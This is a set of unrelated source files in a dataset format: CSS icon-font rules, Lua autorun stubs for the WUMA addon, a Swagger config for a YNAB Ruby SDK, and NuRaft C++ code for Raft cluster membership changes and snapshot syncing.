content: "\e0f4";
}
.icon-home-house-streamline:before {
content: "\e0f5";
}
.icon-locker-streamline-unlock:before {
content: "\e0f6";
}
.icon-lock-locker-streamline:before {
content: "\e0f7";
}
.icon-link-streamline:before {
content: "\e0f8";
}
.icon-man-people-streamline-user:before {
content: "\e0f9";
}
.icon-speech-streamline-talk-user:before {
content: "\e0fa";
}
.icon-settings-streamline-2:before {
content: "\e0fb";
}
.icon-settings-streamline-1:before {
content: "\e0fc";
}
.icon-arrow-carrot-left:before {
content: "\e0fd";
}
.icon-arrow-carrot-right:before {
content: "\e0fe";
}
.icon-arrow-carrot-up:before {
content: "\e0ff";
}
.icon-arrow-carrot-right-alt2:before {
content: "\e100";
}
.icon-arrow-carrot-down-alt2:before {
content: "\e101";
}
.icon-arrow-carrot-left-alt2:before {
content: "\e102";
}
.icon-arrow-carrot-up-alt2:before {
content: "\e103";
}
.icon-arrow-carrot-2up:before {
content: "\e104";
}
.icon-arrow-carrot-2right-alt2:before {
content: "\e105";
}
.icon-arrow-carrot-2up-alt2:before {
content: "\e106";
}
.icon-arrow-carrot-2right:before {
content: "\e107";
}
.icon-arrow-carrot-2left-alt2:before {
content: "\e108";
}
.icon-arrow-carrot-2left:before {
content: "\e109";
}
.icon-arrow-carrot-2down-alt2:before {
content: "\e10a";
}
.icon-arrow-carrot-2down:before {
content: "\e10b";
}
.icon-arrow-carrot-down:before {
content: "\e10c";
}
.icon-arrow-left:before {
content: "\e10d";
}
.icon-arrow-right:before {
content: "\e10e";
}
.icon-arrow-triangle-down:before {
content: "\e10f";
}
.icon-arrow-triangle-left:before {
content: "\e110";
}
.icon-arrow-triangle-right:before {
content: "\e111";
}
.icon-arrow-triangle-up:before {
content: "\e112";
}
.icon-adjust-vert:before {
content: "\e113";
}
.icon-bag-alt:before {
content: "\e114";
}
.icon-box-checked:before {
content: "\e115";
}
.icon-camera-alt:before {
content: "\e116";
}
.icon-check:before {
content: "\e117";
}
.icon-chat-alt:before {
content: "\e118";
}
.icon-cart-alt:before {
content: "\e119";
}
.icon-check-alt2:before {
content: "\e11a";
}
.icon-circle-empty:before {
content: "\e11b";
}
.icon-circle-slelected:before {
content: "\e11c";
}
.icon-clock-alt:before {
content: "\e11d";
}
.icon-close-alt2:before {
content: "\e11e";
}
.icon-cloud-download-alt:before {
content: "\e11f";
}
.icon-cloud-upload-alt:before {
content: "\e120";
}
.icon-compass-alt:before {
content: "\e121";
}
.icon-creditcard:before {
content: "\e122";
}
.icon-datareport:before {
content: "\e123";
}
.icon-easel:before {
content: "\e124";
}
.icon-lightbulb-alt:before {
content: "\e125";
}
.icon-laptop:before {
content: "\e126";
}
.icon-lock-alt:before {
content: "\e127";
}
.icon-lock-open-alt:before {
content: "\e128";
}
.icon-link:before {
content: "\e129";
}
.icon-link-alt:before {
content: "\e12a";
}
.icon-map-alt:before {
content: "\e12b";
}
.icon-mail-alt:before {
content: "\e12c";
}
.icon-piechart:before {
content: "\e12d";
}
.icon-star-half:before {
content: "\e12e";
}
.icon-star-half-alt:before {
content: "\e12f";
}
.icon-star-alt:before {
content: "\e130";
}
.icon-ribbon-alt:before {
content: "\e131";
}
.icon-tools:before {
content: "\e132";
}
.icon-paperclip:before {
content: "\e133";
}
.icon-adjust-horiz:before {
content: "\e134";
}
.icon-social-blogger:before {
content: "\e135";
}
.icon-social-blogger-circle:before {
content: "\e136";
}
.icon-social-blogger-square:before {
content: "\e137";
}
.icon-social-delicious:before {
content: "\e138";
}
.icon-social-delicious-circle:before {
content: "\e139";
}
.icon-social-delicious-square:before {
content: "\e13a";
}
.icon-social-deviantart:before {
content: "\e13b";
}
.icon-social-deviantart-circle:before {
content: "\e13c";
}
.icon-social-deviantart-square:before {
content: "\e13d";
}
.icon-social-dribbble:before {
content: "\e13e";
}
.icon-social-dribbble-circle:before {
content: "\e13f";
}
.icon-social-dribbble-square:before {
content: "\e140";
}
.icon-social-facebook:before {
content: "\e141";
}
.icon-social-facebook-circle:before {
content: "\e142";
}
.icon-social-facebook-square:before {
content: "\e143";
}
.icon-social-flickr:before {
content: "\e144";
}
.icon-social-flickr-circle:before {
content: "\e145";
}
.icon-social-flickr-square:before {
content: "\e146";
}
.icon-social-googledrive:before {
content: "\e147";
}
.icon-social-googledrive-alt2:before {
content: "\e148";
}
.icon-social-googledrive-square:before {
content: "\e149";
}
.icon-social-googleplus:before {
content: "\e14a";
}
.icon-social-googleplus-circle:before {
content: "\e14b";
}
.icon-social-googleplus-square:before {
content: "\e14c";
}
.icon-social-instagram:before {
content: "\e14d";
}
.icon-social-instagram-circle:before {
content: "\e14e";
}
.icon-social-instagram-square:before {
content: "\e14f";
}
.icon-social-linkedin:before {
content: "\e150";
}
.icon-social-linkedin-circle:before {
content: "\e151";
}
.icon-social-linkedin-square:before {
content: "\e152";
}
.icon-social-myspace:before {
content: "\e153";
}
.icon-social-myspace-circle:before {
content: "\e154";
}
.icon-social-myspace-square:before {
content: "\e155";
}
.icon-social-picassa:before {
content: "\e156";
}
.icon-social-picassa-circle:before {
content: "\e157";
}
.icon-social-picassa-square:before {
content: "\e158";
}
.icon-social-pinterest:before {
content: "\e159";
}
.icon-social-pinterest-circle:before {
content: "\e15a";
}
.icon-social-pinterest-square:before {
content: "\e15b";
}
.icon-social-rss:before {
content: "\e15c";
}
.icon-social-rss-circle:before {
content: "\e15d";
}
.icon-social-rss-square:before {
content: "\e15e";
}
.icon-social-share:before {
content: "\e15f";
}
.icon-social-share-circle:before {
content: "\e160";
}
.icon-social-share-square:before {
content: "\e161";
}
.icon-social-skype:before {
content: "\e162";
}
.icon-social-skype-circle:before {
content: "\e163";
}
.icon-social-skype-square:before {
content: "\e164";
}
.icon-social-spotify:before {
content: "\e165";
}
.icon-social-spotify-circle:before {
content: "\e166";
}
.icon-social-spotify-square:before {
content: "\e167";
}
.icon-social-stumbleupon-circle:before {
content: "\e168";
}
.icon-social-stumbleupon-square:before {
content: "\e169";
}
.icon-social-tumbleupon:before {
content: "\e16a";
}
.icon-social-tumblr:before {
content: "\e16b";
}
.icon-social-tumblr-circle:before {
content: "\e16c";
}
.icon-social-tumblr-square:before {
content: "\e16d";
}
.icon-social-twitter:before {
content: "\e16e";
}
.icon-social-twitter-circle:before {
content: "\e16f";
}
.icon-social-twitter-square:before {
content: "\e170";
}
.icon-social-vimeo:before {
content: "\e171";
}
.icon-social-vimeo-circle:before {
content: "\e172";
}
.icon-social-vimeo-square:before {
content: "\e173";
}
.icon-social-wordpress:before {
content: "\e174";
}
.icon-social-wordpress-circle:before {
content: "\e175";
}
.icon-social-wordpress-square:before {
content: "\e176";
}
.icon-social-youtube:before {
content: "\e177";
}
.icon-social-youtube-circle:before {
content: "\e178";
}
.icon-social-youtube-square:before {
content: "\e179";
}
.icon-aim:before {
content: "\e17a";
}
.icon-aim-alt:before {
content: "\e17b";
}
.icon-amazon:before {
content: "\e17c";
}
.icon-app-store:before {
content: "\e17d";
}
.icon-apple:before {
content: "\e17e";
}
.icon-behance:before {
content: "\e17f";
}
.icon-creative-commons:before {
content: "\e180";
}
.icon-dropbox:before {
content: "\e181";
}
.icon-digg:before {
content: "\e182";
}
.icon-last:before {
content: "\e183";
}
.icon-paypal:before {
content: "\e184";
}
.icon-rss:before {
content: "\e185";
}
.icon-sharethis:before {
content: "\e186";
}
.icon-skype:before {
content: "\e187";
}
.icon-squarespace:before {
content: "\e188";
}
.icon-technorati:before {
content: "\e189";
}
.icon-whatsapp:before {
content: "\e18a";
}
.icon-windows:before {
content: "\e18b";
}
.icon-reddit:before {
content: "\e18c";
}
.icon-foursquare:before {
content: "\e18d";
}
.icon-soundcloud:before {
content: "\e18e";
}
.icon-w3:before {
content: "\e18f";
}
.icon-wikipedia:before {
content: "\e190";
}
.icon-grid-2x2:before {
content: "\e191";
}
.icon-grid-3x3:before {
content: "\e192";
}
.icon-menu-square-alt:before {
content: "\e193";
}
.icon-menu:before {
content: "\e194";
}
.icon-cloud-alt:before {
content: "\e195";
}
.icon-tags-alt:before {
content: "\e196";
}
.icon-tag-alt:before {
content: "\e197";
}
.icon-gift-alt:before {
content: "\e198";
}
.icon-comment-alt:before {
content: "\e199";
}
.icon-icon-phone:before {
content: "\e19a";
}
.icon-icon-mobile:before {
content: "\e19b";
}
.icon-icon-house-alt:before {
content: "\e19c";
}
.icon-icon-house:before {
content: "\e19d";
}
.icon-icon-desktop:before {
content: "\e19e";
}
| Groundswell/swell_theme_stamp |
<|start_filename|>lua/autorun/client/autorun.lua<|end_filename|>
WUMA = WUMA or {}
include("wuma/client/init.lua")
<|start_filename|>lua/autorun/server/autorun.lua<|end_filename|>
WUMA = WUMA or {}
include("wuma/init.lua")
| Kill-Zone/wuma |
<|start_filename|>.swagger-codegen/config.json<|end_filename|>
{
"gemName": "ynab",
"moduleName": "YNAB",
"gemDescription": "Ruby gem wrapper for the YNAB API. Read the documentation at https://api.youneedabudget.com",
"gemHomepage": "https://github.com/ynab/ynab-sdk-ruby",
"gemLicense": "Apache-2.0",
"gemAuthor": "You <NAME> Budget, LLC",
"gemAuthorEmail": "<EMAIL>"
}
| ahey/ynab-sdk-ruby |
<|start_filename|>src/handle_join_leave.cxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#include "raft_server.hxx"
#include "cluster_config.hxx"
#include "event_awaiter.h"
#include "peer.hxx"
#include "snapshot_sync_ctx.hxx"
#include "state_machine.hxx"
#include "state_mgr.hxx"
#include "tracer.hxx"
#include <cassert>
#include <sstream>
namespace nuraft {
ptr<resp_msg> raft_server::handle_add_srv_req(req_msg& req) {
std::vector< ptr<log_entry> >& entries = req.log_entries();
ptr<resp_msg> resp = cs_new<resp_msg>
( state_->get_term(),
msg_type::add_server_response,
id_,
leader_ );
if ( entries.size() != 1 ||
entries[0]->get_val_type() != log_val_type::cluster_server ) {
p_db( "bad add server request as we are expecting one log entry "
"with value type of ClusterServer" );
resp->set_result_code(cmd_result_code::BAD_REQUEST);
return resp;
}
if (role_ != srv_role::leader || write_paused_) {
p_er("this is not a leader, cannot handle AddServerRequest");
resp->set_result_code(cmd_result_code::NOT_LEADER);
return resp;
}
// Before checking duplicate ID, confirm srv_to_leave_ is gone.
check_srv_to_leave_timeout();
ptr<srv_config> srv_conf =
srv_config::deserialize( entries[0]->get_buf() );
if ( peers_.find( srv_conf->get_id() ) != peers_.end() ||
id_ == srv_conf->get_id() ) {
p_wn( "the server to be added has a duplicated "
"id with existing server %d",
srv_conf->get_id() );
resp->set_result_code(cmd_result_code::SERVER_ALREADY_EXISTS);
return resp;
}
if (config_changing_) {
// the previous config has not committed yet
p_wn("previous config has not committed yet");
resp->set_result_code(cmd_result_code::CONFIG_CHANGING);
return resp;
}
if (srv_to_join_) {
// Adding server is already in progress.
// Check the last active time of that server.
ulong last_active_ms = srv_to_join_->get_active_timer_us() / 1000;
p_wn("previous adding server (%d) is in progress, "
"last activity: %zu ms ago",
srv_to_join_->get_id(),
last_active_ms);
if ( last_active_ms <=
(ulong)raft_server::raft_limits_.response_limit_ *
ctx_->get_params()->heart_beat_interval_ ) {
resp->set_result_code(cmd_result_code::SERVER_IS_JOINING);
return resp;
}
// Otherwise: activity timeout, reset the server.
p_wn("activity timeout (last activity %lu ms ago), start over",
last_active_ms);
reset_srv_to_join();
}
conf_to_add_ = std::move(srv_conf);
timer_task<int32>::executor exec =
(timer_task<int32>::executor)
std::bind( &raft_server::handle_hb_timeout,
this,
std::placeholders::_1 );
srv_to_join_ = cs_new< peer,
ptr<srv_config>&,
context&,
timer_task<int32>::executor&,
ptr<logger>& >
( conf_to_add_, *ctx_, exec, l_ );
invite_srv_to_join_cluster();
resp->accept(log_store_->next_slot());
return resp;
}
void raft_server::invite_srv_to_join_cluster() {
ptr<req_msg> req = cs_new<req_msg>
( state_->get_term(),
msg_type::join_cluster_request,
id_,
srv_to_join_->get_id(),
0L,
log_store_->next_slot() - 1,
quick_commit_index_.load() );
ptr<cluster_config> c_conf = get_config();
req->log_entries().push_back
( cs_new<log_entry>
( state_->get_term(), c_conf->serialize(), log_val_type::conf ) );
srv_to_join_->send_req(srv_to_join_, req, ex_resp_handler_);
p_in("sent join request to peer %d, %s",
srv_to_join_->get_id(),
srv_to_join_->get_endpoint().c_str());
}
ptr<resp_msg> raft_server::handle_join_cluster_req(req_msg& req) {
std::vector<ptr<log_entry>>& entries = req.log_entries();
ptr<resp_msg> resp = cs_new<resp_msg>
( state_->get_term(),
msg_type::join_cluster_response,
id_,
req.get_src() );
if ( entries.size() != 1 ||
entries[0]->get_val_type() != log_val_type::conf ) {
p_in("receive an invalid JoinClusterRequest as the log entry value "
"doesn't meet the requirements");
return resp;
}
// MONSTOR-8244:
// Adding server may be called multiple times while previous process is
// in progress. It should gracefully handle the new request and should
// not ruin the current request.
bool reset_commit_idx = true;
if (catching_up_) {
p_wn("this server is already in log syncing mode, "
"but let's do it again: sm idx %zu, quick commit idx %zu, "
"will not reset commit index",
sm_commit_index_.load(),
quick_commit_index_.load());
reset_commit_idx = false;
}
p_in("got join cluster req from leader %d", req.get_src());
catching_up_ = true;
role_ = srv_role::follower;
leader_ = req.get_src();
cb_func::Param follower_param(id_, leader_);
(void) ctx_->cb_func_.call(cb_func::BecomeFollower, &follower_param);
if (reset_commit_idx) {
// MONSTOR-7503: We should not reset it to 0.
sm_commit_index_.store( initial_commit_index_ );
quick_commit_index_.store( initial_commit_index_ );
}
state_->set_voted_for(-1);
state_->set_term(req.get_term());
ctx_->state_mgr_->save_state(*state_);
ptr<cluster_config> c_config = cluster_config::deserialize(entries[0]->get_buf());
// WARNING: We should make cluster config durable here. Otherwise, if
// this server gets restarted before receiving the first
// committed config (the first config that includes this server),
// this server will remove itself immediately by replaying
// previous config which does not include this server.
ctx_->state_mgr_->save_config(*c_config);
reconfigure(c_config);
resp->accept( quick_commit_index_.load() + 1 );
return resp;
}
void raft_server::handle_join_cluster_resp(resp_msg& resp) {
if (srv_to_join_ && srv_to_join_ == resp.get_peer()) {
if (resp.get_accepted()) {
p_in("new server (%d) confirms it will join, "
"start syncing logs to it", srv_to_join_->get_id());
sync_log_to_new_srv(resp.get_next_idx());
} else {
p_wn("new server (%d) cannot accept the invitation, give up",
srv_to_join_->get_id());
}
} else {
p_wn("no server to join, drop the message");
}
}
void raft_server::sync_log_to_new_srv(ulong start_idx) {
p_db("[SYNC LOG] peer %d start idx %llu, my log start idx %llu\n",
srv_to_join_->get_id(), start_idx, log_store_->start_index());
// only sync committed logs
ulong gap = ( quick_commit_index_ > start_idx )
? ( quick_commit_index_ - start_idx )
: 0;
ptr<raft_params> params = ctx_->get_params();
if ( ( params->log_sync_stop_gap_ > 0 &&
gap < (ulong)params->log_sync_stop_gap_ ) ||
params->log_sync_stop_gap_ == 0 ) {
p_in( "[SYNC LOG] LogSync is done for server %d "
"with log gap %zu (%zu - %zu, limit %d), "
"now put the server into cluster",
srv_to_join_->get_id(),
gap, quick_commit_index_.load(), start_idx,
params->log_sync_stop_gap_ );
ptr<cluster_config> cur_conf = get_config();
// WARNING:
// If there is any uncommitted changed config,
// new config should be generated on top of it.
if (uncommitted_config_) {
p_in("uncommitted config exists at log %zu, prev log %zu",
uncommitted_config_->get_log_idx(),
uncommitted_config_->get_prev_log_idx());
cur_conf = uncommitted_config_;
}
ptr<cluster_config> new_conf = cs_new<cluster_config>
( log_store_->next_slot(),
cur_conf->get_log_idx() );
new_conf->get_servers().insert( new_conf->get_servers().end(),
cur_conf->get_servers().begin(),
cur_conf->get_servers().end() );
new_conf->get_servers().push_back(conf_to_add_);
new_conf->set_user_ctx( cur_conf->get_user_ctx() );
new_conf->set_async_replication
( cur_conf->is_async_replication() );
ptr<buffer> new_conf_buf(new_conf->serialize());
ptr<log_entry> entry( cs_new<log_entry>( state_->get_term(),
new_conf_buf,
log_val_type::conf ) );
store_log_entry(entry);
config_changing_ = true;
uncommitted_config_ = new_conf;
request_append_entries();
return;
}
ptr<req_msg> req;
// Modified by <NAME>, 12/22, 2017.
// When snapshot transmission is still in progress, start_idx can be 0.
// We should tolerate this.
if (/* start_idx > 0 && */ start_idx < log_store_->start_index()) {
srv_to_join_snp_retry_required_ = false;
bool succeeded_out = false;
req = create_sync_snapshot_req( srv_to_join_,
start_idx,
state_->get_term(),
quick_commit_index_,
succeeded_out );
if (!succeeded_out) {
// If reading snapshot fails, enable HB temporarily to retry it.
srv_to_join_snp_retry_required_ = true;
enable_hb_for_peer(*srv_to_join_);
return;
}
} else {
int32 size_to_sync = std::min(gap, (ulong)params->log_sync_batch_size_);
ptr<buffer> log_pack = log_store_->pack(start_idx, size_to_sync);
p_db( "size to sync: %d, log_pack size %zu\n",
size_to_sync, log_pack->size() );
req = cs_new<req_msg>( state_->get_term(),
msg_type::sync_log_request,
id_,
srv_to_join_->get_id(),
0L,
start_idx - 1,
quick_commit_index_.load() );
req->log_entries().push_back
( cs_new<log_entry>
( state_->get_term(), log_pack, log_val_type::log_pack) );
}
if (!params->use_bg_thread_for_snapshot_io_) {
// Synchronous IO: directly send here.
srv_to_join_->send_req(srv_to_join_, req, ex_resp_handler_);
} else {
// Asynchronous IO: invoke the thread.
snapshot_io_mgr::instance().invoke();
}
}
ptr<resp_msg> raft_server::handle_log_sync_req(req_msg& req) {
std::vector<ptr<log_entry>>& entries = req.log_entries();
ptr<resp_msg> resp
( cs_new<resp_msg>
( state_->get_term(), msg_type::sync_log_response, id_,
req.get_src(), log_store_->next_slot() ) );
p_db("entries size %d, type %d, catching_up %s\n",
(int)entries.size(), (int)entries[0]->get_val_type(),
(catching_up_)?"true":"false");
if ( entries.size() != 1 ||
entries[0]->get_val_type() != log_val_type::log_pack ) {
p_wn("receive an invalid LogSyncRequest as the log entry value "
"doesn't meet the requirements: entries size %zu",
entries.size() );
return resp;
}
if (!catching_up_) {
p_wn("This server is ready for cluster, ignore the request, "
"my next log idx %llu", resp->get_next_idx());
return resp;
}
log_store_->apply_pack(req.get_last_log_idx() + 1, entries[0]->get_buf());
p_db("last log %ld\n", log_store_->next_slot() - 1);
precommit_index_ = log_store_->next_slot() - 1;
commit(log_store_->next_slot() - 1);
resp->accept(log_store_->next_slot());
return resp;
}
void raft_server::handle_log_sync_resp(resp_msg& resp) {
if (srv_to_join_) {
p_db("srv_to_join: %d\n", srv_to_join_->get_id());
// we are reusing heartbeat interval value to indicate when to stop retry
srv_to_join_->resume_hb_speed();
srv_to_join_->set_next_log_idx(resp.get_next_idx());
srv_to_join_->set_matched_idx(resp.get_next_idx() - 1);
sync_log_to_new_srv(resp.get_next_idx());
} else {
p_wn("got log sync resp while srv_to_join is null");
}
}
ptr<resp_msg> raft_server::handle_rm_srv_req(req_msg& req) {
std::vector<ptr<log_entry>>& entries = req.log_entries();
ptr<resp_msg> resp = cs_new<resp_msg>
( state_->get_term(),
msg_type::remove_server_response,
id_,
leader_ );
if (entries.size() != 1 || entries[0]->get_buf().size() != sz_int) {
p_wn("bad remove server request as we are expecting "
"one log entry with value type of int");
resp->set_result_code(cmd_result_code::BAD_REQUEST);
return resp;
}
if (role_ != srv_role::leader || write_paused_) {
p_wn("this is not a leader, cannot handle RemoveServerRequest");
resp->set_result_code(cmd_result_code::NOT_LEADER);
return resp;
}
check_srv_to_leave_timeout();
if (srv_to_leave_) {
p_wn("previous to-be-removed server %d has not left yet",
srv_to_leave_->get_id());
resp->set_result_code(cmd_result_code::SERVER_IS_LEAVING);
return resp;
}
// NOTE:
// Although `srv_to_leave_` is not set, we should check if
// there is any peer whose leave flag is set.
for (auto& entry: peers_) {
ptr<peer> pp = entry.second;
if (pp->is_leave_flag_set()) {
p_wn("leave flag of server %d is set, but the server "
"has not left yet",
pp->get_id());
resp->set_result_code(cmd_result_code::SERVER_IS_LEAVING);
return resp;
}
}
if (config_changing_) {
// the previous config has not committed yet
p_wn("previous config has not committed yet");
resp->set_result_code(cmd_result_code::CONFIG_CHANGING);
return resp;
}
int32 srv_id = entries[0]->get_buf().get_int();
if (srv_id == id_) {
p_wn("cannot request to remove leader");
resp->set_result_code(cmd_result_code::CANNOT_REMOVE_LEADER);
return resp;
}
peer_itor pit = peers_.find(srv_id);
if (pit == peers_.end()) {
p_wn("server %d does not exist", srv_id);
resp->set_result_code(cmd_result_code::SERVER_NOT_FOUND);
return resp;
}
ptr<peer> p = pit->second;
ptr<req_msg> leave_req( cs_new<req_msg>
( state_->get_term(),
msg_type::leave_cluster_request,
id_, srv_id, 0,
log_store_->next_slot() - 1,
quick_commit_index_.load() ) );
// WARNING:
// DO NOT reset HB counter to 0 as removing server
// may be requested multiple times, and anyway we should
// remove that server.
p->set_leave_flag();
if (p->make_busy()) {
p->send_req(p, leave_req, ex_resp_handler_);
p_in("sent leave request to peer %d", p->get_id());
} else {
p->set_rsv_msg(leave_req, ex_resp_handler_);
p_in("peer %d is currently busy, keep the message", p->get_id());
}
resp->accept(log_store_->next_slot());
return resp;
}
ptr<resp_msg> raft_server::handle_leave_cluster_req(req_msg& req) {
ptr<resp_msg> resp
( cs_new<resp_msg>( state_->get_term(),
msg_type::leave_cluster_response,
id_,
req.get_src() ) );
if (!config_changing_) {
p_db("leave cluster, set steps to down to 2");
steps_to_down_ = 2;
resp->accept(log_store_->next_slot());
}
return resp;
}
void raft_server::handle_leave_cluster_resp(resp_msg& resp) {
if (!resp.get_accepted()) {
p_db("peer doesn't accept to stepping down, stop proceeding");
return;
}
p_db("peer accepted to stepping down, removing this server from cluster");
rm_srv_from_cluster(resp.get_src());
}
void raft_server::rm_srv_from_cluster(int32 srv_id) {
if (srv_to_leave_) {
p_wn("to-be-removed server %d already exists, "
"cannot remove server %d for now",
srv_to_leave_->get_id(), srv_id);
return;
}
ptr<cluster_config> cur_conf = get_config();
// NOTE: Need to honor uncommitted config,
// refer to comment in `sync_log_to_new_srv()`
if (uncommitted_config_) {
p_in("uncommitted config exists at log %zu, prev log %zu",
uncommitted_config_->get_log_idx(),
uncommitted_config_->get_prev_log_idx());
cur_conf = uncommitted_config_;
}
ptr<cluster_config> new_conf = cs_new<cluster_config>
( log_store_->next_slot(),
cur_conf->get_log_idx() );
for ( cluster_config::const_srv_itor it = cur_conf->get_servers().begin();
it != cur_conf->get_servers().end();
++it ) {
if ((*it)->get_id() != srv_id) {
new_conf->get_servers().push_back(*it);
}
}
new_conf->set_user_ctx( cur_conf->get_user_ctx() );
new_conf->set_async_replication
( cur_conf->is_async_replication() );
p_in( "removed server %d from configuration and "
"save the configuration to log store at %llu",
srv_id,
new_conf->get_log_idx() );
config_changing_ = true;
uncommitted_config_ = new_conf;
ptr<buffer> new_conf_buf( new_conf->serialize() );
ptr<log_entry> entry( cs_new<log_entry>( state_->get_term(),
new_conf_buf,
log_val_type::conf ) );
store_log_entry(entry);
auto p_entry = peers_.find(srv_id);
if (p_entry != peers_.end()) {
ptr<peer> pp = p_entry->second;
srv_to_leave_ = pp;
srv_to_leave_target_idx_ = new_conf->get_log_idx();
p_in("set srv_to_leave_, "
"server %d will be removed from cluster, config %zu",
srv_id, srv_to_leave_target_idx_);
}
request_append_entries();
}
void raft_server::handle_join_leave_rpc_err(msg_type t_msg, ptr<peer> p) {
if (t_msg == msg_type::leave_cluster_request) {
p_in( "rpc failed for removing server (%d), "
"will remove this server directly",
p->get_id() );
/**
* In case of there are only two servers in the cluster,
* it will be safe to remove the server directly from peers
* as at most one config change could happen at a time
* prove:
* assume there could be two config changes at a time
* this means there must be a leader after previous leader
* offline, which is impossible (no leader could be elected
* after one server goes offline in case of only two servers
* in a cluster)
* so the bug
* https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E
* does not apply to cluster which only has two members
*/
if (peers_.size() == 1) {
peer_itor pit = peers_.find(p->get_id());
if (pit != peers_.end()) {
pit->second->enable_hb(false);
peers_.erase(pit);
p_in("server %d is removed from cluster", p->get_id());
} else {
p_in("peer %d cannot be found, no action for removing",
p->get_id());
}
if (srv_to_leave_) {
reset_srv_to_leave();
}
}
if (srv_to_leave_) {
// WARNING:
// If `srv_to_leave_` is already set, this function is probably
// invoked by `handle_hb_timeout`. In such a case, the server
// to be removed does not respond while the leader already
// generated the log for the configuration change. We should
// abandon the peer entry from `peers_`.
p_wn("srv_to_leave_ is already set to %d, will remove it from "
"peer list", srv_to_leave_->get_id());
remove_peer_from_peers(srv_to_leave_);
reset_srv_to_leave();
} else {
// Set `srv_to_leave_` and generate a log for configuration change.
rm_srv_from_cluster(p->get_id());
}
} else {
p_in( "rpc failed again for the new coming server (%d), "
"will stop retry for this server",
p->get_id() );
config_changing_ = false;
reset_srv_to_join();
}
}
void raft_server::reset_srv_to_join() {
clear_snapshot_sync_ctx(*srv_to_join_);
srv_to_join_->shutdown();
srv_to_join_.reset();
}
void raft_server::reset_srv_to_leave() {
srv_to_leave_->shutdown();
srv_to_leave_.reset();
srv_to_leave_target_idx_ = 0;
p_in("clearing srv_to_leave_");
}
} // namespace nuraft;
<|start_filename|>src/snapshot_sync_ctx.cxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-present eBay Inc.
Author/Developer(s): <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#include "snapshot_sync_ctx.hxx"
#include "event_awaiter.h"
#include "peer.hxx"
#include "raft_server.hxx"
#include "state_machine.hxx"
#include "tracer.hxx"
namespace nuraft {
class raft_server;
snapshot_sync_ctx::snapshot_sync_ctx(const ptr<snapshot>& s,
int peer_id,
ulong timeout_ms,
ulong offset)
: peer_id_(peer_id)
, snapshot_(s)
, offset_(offset)
, user_snp_ctx_(nullptr)
{
// 10 seconds by default.
timer_.set_duration_ms(timeout_ms);
}
void snapshot_sync_ctx::set_offset(ulong offset) {
if (offset_ != offset) timer_.reset();
offset_ = offset;
}
struct snapshot_io_mgr::io_queue_elem {
io_queue_elem( ptr<raft_server> r,
ptr<snapshot> s,
ptr<snapshot_sync_ctx> c,
ptr<peer> p,
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) >& h )
: raft_(r)
, snapshot_(s)
, sync_ctx_(c)
, dst_(p)
, handler_(h)
{}
ptr<raft_server> raft_;
ptr<snapshot> snapshot_;
ptr<snapshot_sync_ctx> sync_ctx_;
ptr<peer> dst_;
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) > handler_;
};
snapshot_io_mgr::snapshot_io_mgr()
: io_thread_ea_(new EventAwaiter())
, terminating_(false)
{
io_thread_ = std::thread(&snapshot_io_mgr::async_io_loop, this);
}
snapshot_io_mgr::~snapshot_io_mgr() {
shutdown();
}
bool snapshot_io_mgr::push(ptr<snapshot_io_mgr::io_queue_elem>& elem) {
auto_lock(queue_lock_);
logger* l_ = elem->raft_->l_.get();
// If there is existing one for the same peer, ignore it.
for (auto& entry: queue_) {
if ( entry->raft_ == elem->raft_ &&
entry->dst_->get_id() == elem->dst_->get_id() ) {
p_tr("snapshot request for peer %d already exists, do nothing",
elem->dst_->get_id());
return false;
}
}
queue_.push_back(elem);
p_tr("added snapshot request for peer %d", elem->dst_->get_id());
return true;
}
bool snapshot_io_mgr::push(ptr<raft_server> r,
ptr<peer> p,
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) >& h)
{
ptr<io_queue_elem> elem =
cs_new<io_queue_elem>( r,
p->get_snapshot_sync_ctx()->get_snapshot(),
p->get_snapshot_sync_ctx(),
p,
h );
return push(elem);
}
void snapshot_io_mgr::invoke() {
io_thread_ea_->invoke();
}
void snapshot_io_mgr::drop_reqs(raft_server* r) {
auto_lock(queue_lock_);
logger* l_ = r->l_.get();
auto entry = queue_.begin();
while (entry != queue_.end()) {
if ((*entry)->raft_.get() == r) {
p_tr("drop snapshot request for peer %d, raft server %p",
(*entry)->dst_->get_id(), r);
entry = queue_.erase(entry);
} else {
entry++;
}
}
}
bool snapshot_io_mgr::has_pending_request(raft_server* r, int srv_id) {
auto_lock(queue_lock_);
for (auto& entry: queue_) {
if ( entry->raft_.get() == r &&
entry->dst_->get_id() == srv_id ) {
return true;
}
}
return false;
}
void snapshot_io_mgr::shutdown() {
terminating_ = true;
if (io_thread_.joinable()) {
io_thread_ea_->invoke();
io_thread_.join();
}
}
void snapshot_io_mgr::async_io_loop() {
std::string thread_name = "nuraft_snp_io";
#ifdef __linux__
pthread_setname_np(pthread_self(), thread_name.c_str());
#elif __APPLE__
pthread_setname_np(thread_name.c_str());
#endif
do {
io_thread_ea_->wait_ms(1000);
io_thread_ea_->reset();
std::list< ptr<io_queue_elem> > reqs;
std::list< ptr<io_queue_elem> > reqs_to_return;
if (!terminating_) {
auto_lock(queue_lock_);
reqs = queue_;
}
for (ptr<io_queue_elem>& elem: reqs) {
if (terminating_) {
break;
}
if (!elem->raft_->is_leader()) {
break;
}
int dst_id = elem->dst_->get_id();
std::unique_lock<std::mutex> lock(elem->dst_->get_lock());
// ---- lock acquired
logger* l_ = elem->raft_->l_.get();
ulong obj_idx = elem->sync_ctx_->get_offset();
void*& user_snp_ctx = elem->sync_ctx_->get_user_snp_ctx();
